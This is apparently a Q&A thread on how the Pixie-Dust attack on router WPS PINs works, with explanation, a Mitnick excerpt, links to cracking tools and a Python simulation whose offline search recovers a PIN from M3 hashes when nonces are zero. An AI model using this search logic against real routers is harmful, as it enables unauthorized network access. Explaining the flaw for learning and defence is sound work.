
I read an article on this site, but didn't get what I wanted so my concerns are:

  1. How does pixie dust attack work?
  2. What is the flaw that only certain routers contain to being vulnerable for Pixie-Dust attack?
Shubham Wagh

2 Answers


A Pixie-Dust attack works by bruteforcing the key for a protocol called WPS. WPS was intended to make accessing a router easier, and it did - for attackers.

A WPS PIN consists of 8 digits - two Pre-Shared-Keys or PSKs. Each PSK has half the PIN. To understand how a Pixie Dust attack works, you'll need to understand how the requests to the AP work:

1. Computer sends - EAPOL Start

2. Router sends - EAP-Request for the Identity

3. Computer sends - Responds with the Identity

4. Router sends - EAP request

5. Computer sends - EAP response
...

And it loops these requests a few more times before the credentials are sent.

However, during this process, your computer has been given the following:

  • Diffie Hellman Public key of the Enrollee

  • Diffie Hellman Public key of the Registrar

  • Two hashes - of the WPS PIN

  • Enrollee nonce and a derived authkey

Now in order to successfully bruteforce the previously mentioned PSKs, you'll need two more nonces - which are supposed to be randomly generated. And this is the most important part - since the random numbers are not really random but are derivations of the hashes (or are just zeroes), we can bruteforce this key, even on a slow system! It will work if the implementation on the router is bad (which it is in most cases), and you should be able to find a list of vulnerable routers on the internet.

tl;dr: We bruteforce a badly generated key because of a flaw in how the random numbers are generated in many routers.

thel3l
  • So it means it's just like Reaver but bruteforces PSKs instead of the WPS PIN and is very fast? – Shubham Wagh Jan 23 '17 at 11:23
  • @ShubhamWagh Reaver *is a pixie dust attack*. You haven't understood what I said - the pin IS THE PSK. 8 digits - broken into two halves and hashed. We hash possibilities until they match and find the pin. – thel3l Jan 23 '17 at 11:25
  • @ShubhamWagh - you may want to do a little homework on the basics of networking before breaking into WPS bruteforce - it'll help you not join the masses of skiddies out there. – thel3l Jan 23 '17 at 11:26
  • Oh ok, thanks, I will do that, but one last question: so is Pixie Dust just a name for brute forcing WPS? – Shubham Wagh Jan 23 '17 at 11:28
  • @ShubhamWagh PD is the name of the technique. Reaver is the tool. – thel3l Jan 23 '17 at 11:36
  • Here you have a very explicative pdf about it, done by Dominique Bongard: http://archive.hack.lu/2014/Hacklu2014_offline_bruteforce_attack_on_wps.pdf – OscarAkaElvis Jan 23 '17 at 13:51
  • Bit late, but for anyone caring about the difference, Reaver abuses an error code and bruteforces against the access point. Pixie captures a derivative of the key and bruteforces it locally. – J.A.K. Sep 04 '17 at 16:46
  • The main difference is that Reaver is basically an online brute force attack - it asks the AP for every try and, based on the AP's response, it knows if the PIN is correct or not. Pixie Dust is an offline attack - you just need the hashes from the first try and then you can brute force it without asking the AP, just by trying PIN combinations, hashing them and comparing with the original hash. – Risinek Apr 14 '21 at 23:24
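To make the offline step in the answer above concrete, here is an added Python simulation (not code from the answer, from Reaver or from any other WPS tool) of the M3 hash derivation it describes: a constructed AuthKey and DH public keys stand in for the real values, a "weak" enrollee uses all-zero E-S1/E-S2 nonces while a correct one uses random nonces, and the same offline search recovers the PIN from the two hashes only in the weak case. AUTH_KEY, PKE and PKR are constructed stand-ins, not captured values.

```python
import hashlib
import hmac
import os

# Constructed sample values (not captured from any device). In a real exchange
# AuthKey is derived from the Diffie-Hellman secret and the nonces, and PKE/PKR
# are the 192-byte DH public keys carried in M1/M2; only the sizes are realistic.
AUTH_KEY = hashlib.sha256(b"constructed authkey").digest()          # 256-bit AuthKey
PKE = hashlib.sha256(b"constructed enrollee pubkey").digest() * 6   # 192 bytes
PKR = hashlib.sha256(b"constructed registrar pubkey").digest() * 6  # 192 bytes


def psk_halves(pin: str) -> tuple:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, half of the PIN)."""
    h1 = hmac.new(AUTH_KEY, pin[:4].encode(), hashlib.sha256).digest()[:16]
    h2 = hmac.new(AUTH_KEY, pin[4:].encode(), hashlib.sha256).digest()[:16]
    return h1, h2


def e_hash(psk: bytes, es: bytes) -> bytes:
    """E-Hash = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR), as sent in M3."""
    return hmac.new(AUTH_KEY, es + psk + PKE + PKR, hashlib.sha256).digest()


def enrollee_m3(pin: str, good_rng: bool) -> tuple:
    """Simulate the enrollee's M3. A weak firmware uses E-S1 = E-S2 = 0;
    a correct one draws two fresh 128-bit random nonces."""
    es1 = os.urandom(16) if good_rng else bytes(16)
    es2 = os.urandom(16) if good_rng else bytes(16)
    psk1, psk2 = psk_halves(pin)
    return e_hash(psk1, es1), e_hash(psk2, es2)


def offline_guess(ehash1: bytes, ehash2: bytes, assumed_es: bytes = bytes(16)):
    """Try to recover the PIN from the two M3 hashes alone, assuming the nonce
    value a weak implementation used (all zeros). Each half costs at most
    10**4 HMACs, so the search finishes in seconds on any machine."""
    first = second = None
    for i in range(10_000):
        half = f"{i:04d}"
        psk = hmac.new(AUTH_KEY, half.encode(), hashlib.sha256).digest()[:16]
        if first is None and e_hash(psk, assumed_es) == ehash1:
            first = half
        if second is None and e_hash(psk, assumed_es) == ehash2:
            second = half
        if first and second:
            return first + second
    return None  # nonces were unpredictable: nothing to recover offline
```

With random nonces the attacker would also have to guess 128 bits of E-S1 and E-S2, which is why the fix is simply a proper RNG in the enrollee, and why disabling WPS removes the exposure entirely.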

In one of his books, Kevin D. Mitnick writes about the Pixie Dust attack:

To make connecting any new device to a home router easy, the Wi-Fi Alliance, a group of vendors eager to spread the use of Wi-Fi technologies, created WiFi protected setup (WPS). WPS was advertised as a way for anyone—I mean anyone—to securely set up a mobile device at home or in the office. In reality, though, it’s not very secure.

WPS is typically a button that you push on the router. Other methods include use of a PIN and near field communication (NFC). Simply put, you activate the WPS feature, and it communicates with any new devices you have in your home or office, automatically synchronizing them to work with your Wi-Fi network.

Sounds great. However, if the router is out in “public”—say, in your living room—then anyone can touch the WPS button and join your home network. Even without physical access, an online attacker can use brute force to guess your WPS PIN. It could take several hours, but it’s still a viable attack method, one you should protect yourself against by immediately turning off WPS on the router.

Another WPS attack method is known as Pixie Dust. This is an offline attack and affects only a few chip makers, including Ralink, Realtek, and Broadcom. Pixie Dust works by helping hackers gain access to the passwords on wireless routers. Basically the tool is very straightforward and can gain access to a device in seconds or hours depending on the complexity of the chosen or generated WPS PIN. For example, one such program, Reaver, can crack a WPS-enabled router within several hours.

Art of Invisibility by Kevin Mitnick (PDF).

To be more clear here are some helpful links about hacking tools for cracking WPS: Link #1, Link #2, Link #3.

cyberbird